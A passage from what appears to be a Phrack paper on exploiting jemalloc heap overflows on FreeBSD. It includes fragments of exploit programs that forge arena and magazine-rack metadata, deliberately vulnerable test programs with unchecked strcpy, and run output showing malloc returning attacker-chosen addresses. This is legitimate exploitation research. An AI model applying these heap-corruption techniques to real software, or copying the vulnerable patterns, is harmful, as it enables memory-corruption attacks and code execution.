as allocated in the jemalloc metadata. Trying to free an unallocated page
will result in the red-black tree implementation of jemalloc entering
an endless loop or, rarely, segfaulting.
The exploit code for the vulnerable program presented in this section
can be seen below. It was coded on an x86 FreeBSD-8.2-RELEASE system, so
the offsets of the metadata may vary for your platform. Given the address
of an existing arena (arena A of step 2), it creates a file that contains
the exploitation vector. This file should be passed as argument to the
vulnerable target (full code in file exploit-chunk.c):
if(argc != 2) {
fprintf(stderr, "%s <arena>\n", argv[0]);
return 0;
}
memset(buffer, 0, sizeof(buffer));
p = buffer;
strncpy(p, "1234567890123456", 16);
p += 16;
/* Arena address. */
*(size_t *)p = (size_t)strtoul(argv[1], NULL, 16);
p += sizeof(size_t);
p += 32;
It is now time for some action. First, let's compile and run the vulnerable
code.
$ ./vuln-chunk
# Chunk 0x28200000 belongs to arena 0x8049d98
# Chunk 0x28300000 belongs to arena 0x8049d98
...
# Region at 0x28301030
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
p3 = 0x28302000
# Region at 0x28301030
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
The output is what one expects it to be. First, the vulnerable code forces
the allocator to initialize a new chunk (0x28300000) and then requests
a memory region which is given the address 0x28301030. The next call to
'malloc()' returns 0x28302000. So far so good. Let's feed our target
with the exploitation vector and see what happens.
$ ./exploit-chunk 0x8049d98
$ ./vuln-chunk exploit2.v
# Chunk 0x28200000 belongs to arena 0x8049d98
# Chunk 0x28300000 belongs to arena 0x8049d98
...
Read 56 bytes
# Region at 0x28301030
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
p3 = 0x28301000
# Region at 0x28301030
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
As you can see the second call to 'malloc()' returns a new region
'p3 = 0x28301000' which lies 0x30 bytes before 'first' (0x28301030)!
2) Overwrite of the run metadata (in case the overflown region is the
last in a run).
3) Overwrite of the arena chunk metadata (in case the overflown region
is the last in a chunk).
That said we believe we have covered most of the cases that an attacker
may encounter. Feel free to contact us if you think we have missed
something important.
mag_rack_t *
mag_rack_create(arena_t *arena)
{
...
return (arena_malloc_small(arena, sizeof(mag_rack_t) +
(sizeof(bin_mags_t) * (nbins - 1)), true));
}
A size of 240 is actually serviced by the bin holding regions of 256 bytes.
Issuing calls to 'malloc(256)' will eventually end up in a user controlled
region physically bordering a 'mag_rack_t'. The following vulnerable code
emulates this situation (file vuln-mag.c):
if(arg)
strcpy(v, (char *)arg);
return NULL;
}
if(argc != 3) {
printf("%s <thread_count> <buff>\n", argv[0]);
return 0;
}
tcount = atoi(argv[1]);
tid = (pthread_t *)alloca(tcount * sizeof(pthread_t));
pthread_join(vid, NULL);
for(i = 0; i < tcount; i++)
pthread_join(tid[i], NULL);
pthread_exit(NULL);
}
if(argc != 2) {
printf("%s <mag_t address>\n", argv[0]);
return 1;
}
fake_mag_t_p = (size_t)strtoul(argv[1], NULL, 16);
$ ./exploit-mag
./exploit-mag <mag_t address>
$ ./exploit-mag 0xdeadbeef
[*] Assuming fake mag_t is at 0xdeadbeef
[*] Preparing input buffer
[*] Executing the vulnerable program
[*] 0xbfbfedd6
...
$ ./exploit-mag 0xbfbfedd6
[*] Assuming fake mag_t is at 0xbfbfedd6
[*] Preparing input buffer
[*] Executing the vulnerable program
[*] 0xbfbfedd6
[vuln] v = 0x28311100
[673283456] p1 = 0x28317800
...
[673283456] p2 = 0x42424242
[673282496] p2 = 0x3d545f47
Neat. One of the victim threads, the one whose magazine rack is overflown,
returns an arbitrary address as a valid region. Overwriting the thread
caches is probably the most lethal attack but it suffers from a limitation
which we do not consider serious. The fact that the returned memory region
and the 'bin_mags[]' element both receive arbitrary addresses, results in a
segfault either on the deallocation of 'p2' or once the thread dies by
explicitly or implicitly calling 'pthread_exit()'. Possible shellcodes
should be triggered _before_ the thread exits or the memory region is
freed. Fair enough... :)
For a detailed case study on jemalloc heap overflows see the second Art of
Exploitation paper in this issue of Phrack.
This paper is the first public treatment of jemalloc that we are aware
of. In the near future, we are planning to research how one can corrupt
the various red black trees used by jemalloc for housekeeping. The rbtree
implementation (defined in rb.h) is fully based on preprocessor macros
and it's quite complex in nature. Although we have already debugged them,
due to lack of time we didn't attempt to exploit the various tree
operations performed on rbtrees. We wish that someone will continue our
work from where we left of. If no one does, then you definitely know whose
articles you'll soon be reading :)
--[ 6 - Conclusion
Many thanks to the Phrack staff for their comments. Also, thanks to George
Argyros for reviewing this work and making insightful suggestions.
Finally, we would like to express our respect to Jason Evans for such a
leet allocator. No, that isn't ironic; jemalloc is, in our opinion, one of
the best (if not the best) allocators out there.
--[ 7 - References
[UJEM] unmask_jemalloc
- https://github.com/argp/unmask_jemalloc
--[ 8 - Code
--[ EOF